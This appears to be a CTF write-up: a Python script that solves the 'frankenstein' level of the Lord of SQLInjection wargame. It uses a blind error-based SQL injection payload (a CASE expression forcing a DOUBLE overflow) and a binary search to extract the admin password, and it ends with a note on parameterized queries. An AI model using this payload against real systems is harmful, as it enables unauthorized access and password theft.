WRITE UP
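import re

import requests

# Solver for the "frankenstein" level of the Lord of SQLInjection training
# wargame (los.rubiya.kr). It recovers the admin pw through a blind,
# error-based oracle: the injected CASE expression returns 1 when the guess
# holds and otherwise evaluates 9e307*2, which exceeds the DOUBLE range and
# makes MySQL raise an error. A binary search over that yes/no answer narrows
# the value down.
#
# Defensive takeaway: the payload only works if `pw` is concatenated into the
# SQL text, so binding it as a query parameter removes the injection; and the
# oracle only exists because a failed statement produces a visibly different
# response from a successful one.

url = "http://los.rubiya.kr/frankenstein_b5bab23e64777e1756174ad33f14b5db.php"
# Placeholder: replace MY_SESSION with the player's own wargame session cookie.
session = {'PHPSESSID': 'MY_SESSION'}
data = {}
flag = ""

# Upper bound on each HTTP call so a stalled connection cannot hang the script.
REQUEST_TIMEOUT = 10


def even_hex(value):
    """Return ``value`` as a ``0x`` literal with an even number of hex digits.

    An even digit count keeps the literal byte-aligned, which both the SQL
    hex literal and ``bytes.fromhex`` need.
    """
    digits = format(value, "x")
    if len(digits) % 2:
        digits = "0" + digits
    return "0x" + digits


# Search window: any value that fits in 10 bytes.
low = 0
high = 0xffffffffffffffffffff
while high != low:
    # Upper midpoint, so the window always shrinks when the answer is "no".
    mid = low + (high - low) // 2 + 1
    data['pw'] = "' or id='admin' and case when pw<" + even_hex(mid) + " then 1 else 9e307*2 end#"
    res = requests.get(url, params=data, cookies=session, timeout=REQUEST_TIMEOUT)
    # NOTE(review): "config" presumably appears only when the page rendered
    # normally (no SQL error), i.e. pw < mid -- confirm against the challenge page.
    if "config" in res.text:
        high = mid - 1
    else:
        low = mid

# Pad before decoding: bytes.fromhex raises ValueError on an odd digit count,
# which the original only guarded against for the SQL literal.
flag = bytes.fromhex(even_hex(low)[2:]).decode('utf-8')
# Raw string avoids the invalid-escape warning that '\S*' triggers; keep only
# the leading run of non-whitespace characters, lower-cased.
flag = re.match(r'\S*', flag).group().lower()
print("[∞] flag : " + flag)

# Submit the recovered value as a plain password to confirm the level is solved.
data['pw'] = flag
res = requests.get(url, params=data, cookies=session, timeout=REQUEST_TIMEOUT)
if "Clear!" in res.text:
    print("[♪] FRANKENSTEIN Clear!")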